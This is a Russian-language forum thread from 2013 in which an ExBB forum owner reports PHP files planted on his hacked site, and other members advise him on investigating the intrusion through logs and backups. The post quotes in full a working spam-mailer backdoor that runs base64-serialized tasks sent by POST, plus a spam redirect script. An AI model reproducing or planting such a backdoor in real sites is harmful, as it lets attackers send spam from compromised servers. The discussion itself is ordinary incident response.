ExBB Community ExBB Community
 Сайт проекта ExBB Общение объединяет!
Войдите на форум при помощиВойти через loginza
 Чат на форуме      Помощь      Поиск      Пользователи     BanList BanList


 Страниц (1): [1]   

> Без описания
roma1
Отправлено: 1 сентября 2013 — 19:58
Post Id



Пользователь
Super Member


Покинул форум
Сообщений всего: 811
Дата рег-ции: Янв. 2011  
Откуда: СССР
Репутация: 24




пропал пользователь, я стал разбираться и полез по фтп в корень форума в папку с форумом, кроме файлов движка php я увидел штук 10 php файлов с безсмысленными названиями типа
Цитата:
wqrrpiw.php
с неким внутренним наполнением типа...
CODE:
<?php
if (isset($_POST['task']))
{

error_reporting(E_ALL);
ini_set('display_errors', TRUE);
ini_set('memory_limit', '512M');
set_time_limit(0);
ini_set('max_execution_time',0);
ini_set('set_time_limit',0);

$x = unserialize(base64_decode($_POST['task']));
if ($x==false) {exit();}


$send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);

foreach ($x as $arr)
{
echo $arr['to']."\r\n";

$arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']);

mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
}
exit('SEND OK');
}


или...

CODE:
<?php

header('Location: http://datingvule.ru');

?>


кто подскажет как это понять? я то удалил эти файлы с папки с форумом, но кто знает нет ли их в подпапках, нет ли правок в истинных файлах движка Огорчение
я в полном смятении мягко сказать, пароль от фтп только у меня и может у хостера есть.
 
 
1Bot
Отправлено: 2 сентября 2013 — 06:20
Post Id



Пользователь
Super Member


Покинул форум
Сообщений всего: 773
Дата рег-ции: Апр. 2009  
Откуда: Днепропетровск
Репутация: 69




roma1
Прискорбно. Налицо все следы взлома. А вот причин может быть несколько: от подбора пароля к ftp, до прямого доступа в файловой системе хостера одним из таких же как Вы пользователей, ну и через форум возможно так сделать при наличии определенных прав доступа.

А вот файлы с дырами зря удалили - их надо бы изучать (хотя бы скопировать к себе для изучения после удаления), чтобы понять кто, что и зачем так сделал - от хостера рекомендую взять логи apache за последнюю неделю и посмотреть откуда к этим файлам обращались, ну и ежедневные архивы просмотреть на предмет определения даты когда эти файлы появились.
(Добавление)
roma1
Первый скрипт используется для массовой рассылки писем (спама скорее всего), второй - для перенаправления на сайт, возможно рекламный.
 
 
roma1
Отправлено: 2 сентября 2013 — 06:46
Post Id



Пользователь
Super Member


Покинул форум
Сообщений всего: 811
Дата рег-ции: Янв. 2011  
Откуда: СССР
Репутация: 24




ну вот в этих 11 файлах только то что я скопировал выше и ничего более, только файлы с разными безсмысленными названиями, пять файлов с кодом выше и шесть с тем что ниже я скопировал. Файлы есть но в движке оставлять я побоялся. Права на папку с форумом 750 стоят, куда уже более строго?
1Bot пишет:
ну и через форум возможно так сделать при наличии определенных прав доступа.
об этом я не знаю даже как Огорчение
стукну к хостеру но боюсь они так с правами намутят что опять форум ляжет.
 
 
1Bot
Отправлено: 2 сентября 2013 — 06:59
Post Id



Пользователь
Super Member


Покинул форум
Сообщений всего: 773
Дата рег-ции: Апр. 2009  
Откуда: Днепропетровск
Репутация: 69




roma1
Еще нужно было у тех удаленных файлов посмотреть дату создания, владельца и права на эти файлы - тоже бы кое-что прояснилось.
А бекапы то есть ежедневные?

(Отредактировано автором: 2 сентября 2013 — 07:00)

 
 
roma1
Отправлено: 2 сентября 2013 — 07:40
Post Id



Пользователь
Super Member


Покинул форум
Сообщений всего: 811
Дата рег-ции: Янв. 2011  
Откуда: СССР
Репутация: 24




бекап есть с файлами и вижу что числа с 22 прошлого месяца где то через день создавались эти файлы по дате в архиве. Вчера был создан последний но вчера выкачал бекап и сменил пароль к фтп сегодня посмотрю не будет ли новых файлов.

хм. если бы кто влез через фтп, он мог снести всё и повредить форум, врятли стал подбрасывать левые файлы регулярно.
(Добавление)
Где то на форуме нашли дыру скорее всего.

(Отредактировано автором: 2 сентября 2013 — 07:43)

 
 
NordWest
Отправлено: 2 сентября 2013 — 07:48
Post Id



Пользователь
Super Member


Покинул форум
Сообщений всего: 994
Дата рег-ции: Дек. 2011  
Откуда: Северо-Запад
Репутация: 76




Цитата:
он мог снести всё и повредить форум, врятли стал подбрасывать левые файлы
А какая коммерческая выгода от простого сноса форума? Значительно выгоднее от вас спам рассылать.
 
 
1Bot
Отправлено: 2 сентября 2013 — 08:12
Post Id



Пользователь
Super Member


Покинул форум
Сообщений всего: 773
Дата рег-ции: Апр. 2009  
Откуда: Днепропетровск
Репутация: 69




roma1 пишет:
числа с 22 прошлого месяца где то через день создавались эти файлы по дате в архиве

Возьмите у хостера логи apache за это число и определите по ним, с какого IP вызывались эти скрипты и потом по IP нужно посмотреть файлы форума, которые вызывал тот же пользователь - в них и искать уязвимость, да и права на основную папку с форумом в ту дату нужно смотреть.
 
 
Страниц (1): [1]
Сейчас эту тему просматривают: 1 (гостей: 1, зарегистрированных: 0)
« Уязвимости »

> Похожие темы: Взлом форума
Темы Форум Информация о теме Обновление
Отображение списка online
Как отобразить список участников online на каждой странице форума
Обсуждение Ответов: 5
Автор темы: Марта
9 февраля 2010 — 22:09
Автор: yura3d
[ВЫПОЛНЕНО] Нужен мод notabenoid
Аналог в одном из форумов моего форума
Коммерческая зона Ответов: 6
Автор темы: Guyver
24 января 2016 — 14:17
Автор: Guyver
Оптимизация страницы
Как оптимизировать страницу форума?
Общие вопросы Ответов: 40
Автор темы: m0ntag
30 мая 2013 — 06:51
Автор: CAB
Предварительный просмотр тем оформления
На базе демонстрационного форума
Темы оформления Ответов: 30
Автор темы: yura3d
28 декабря 2018 — 11:56
Автор: 1Bot
Объявление на форуме для гостей (или для пользователей с другими правами) с админкой
На главной форума, но можно вывести в любом другом месте
Модификации и дополнения Ответов: 1
Автор темы: Guyver
8 сентября 2016 — 16:30
Автор: Liliat
 



Все гости форума могут просматривать этот раздел.
Только администраторы и модераторы могут создавать новые темы в этом разделе.
Только администраторы и модераторы могут отвечать на сообщения в этом разделе.
 




Яндекс.Метрика   

Powered by ExBB
ExBB FM 1.0 RC1 by TvoyWeb.ru
InvisionExBB Style converted by Markus®

[Script Execution time: 0.0638]     [ ]